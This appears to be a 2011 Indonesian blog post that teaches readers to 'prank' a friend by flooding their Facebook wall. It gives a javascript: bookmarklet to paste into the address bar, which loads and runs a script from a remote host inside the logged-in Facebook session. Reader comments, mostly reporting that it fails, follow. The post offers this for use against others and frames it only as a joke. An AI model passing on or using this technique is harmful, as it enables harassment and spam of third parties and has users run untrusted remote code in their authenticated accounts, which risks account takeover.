Isengin FB teman dengan Script Flood

Tuesday, January 18, 2011

skrg aku mau bagi" script flood buat flood FB teman2 kalian
oke lgsng aja ya cekidot
:mKening:

Caranya :

1. buka profil FB teman yg mw d'isengin
2. abis itu kan misal'a URL ( addres ) temen km kan begini

http://www.facebook.com/Ricky.Sang.Pencabut.Nyawa#!/

3. ganti dengan script ini URL'a :

javascript:(a = (b = document).createElement("script")).src = "//xenonime.com/tools/wew.js", b.body.appendChild(a); void(0);

5. Tekan Enter, Isikan misalnya 20
6. ntar kluar lagi kyk gini:

Masukkan pesan yg mau dikirim

7. masukin aja pesan yg mw km kirim ke dinding korban
klo udah kita klik " OK "
tgg beberapa detik 5 - 10 ,
8. ok coba lgsng refresh profil'a dan lihat hasil'a
:mHaha:


NB : PESAN JGN TERLALU BANYAK NANTI KENA BLOKIR SAMA FB



Sharing Itu Indah

Agar teman-teman Anda mendapat manfaat dari artikel ini, jangan lupa SHARE di FACEBOOK lewat tombol di bawah ini.

Bagikan

.::Artikel Menarik Lainnya::.

6 Comments:

John Terro said...

efeknya bisa gimana tuh?

otto kvlt said...

bisa kirim wall post sampek banyak, semau yang kita mau.

Anonymous said...

box dialognya ko ga bisa muncul sih
??????????????

hellcyber said...

IJIN TUKER LINK BRO..N LAM KENAL..NI LINK GW PASANG OK (INDAHNYA BERBAGI)

Anonymous said...

gan knp scriptnya ga bsa jalan,,pdhl udh dcoba bbrpa X.moMohon pnjelasanya

muhammad akbar said...

kok gak bisa yaaq ?

 
FaceBlog © Copyright 2009 Iseng - Iseng Nge'Blog | Blogger XML Coded And Designed by Otto Aristho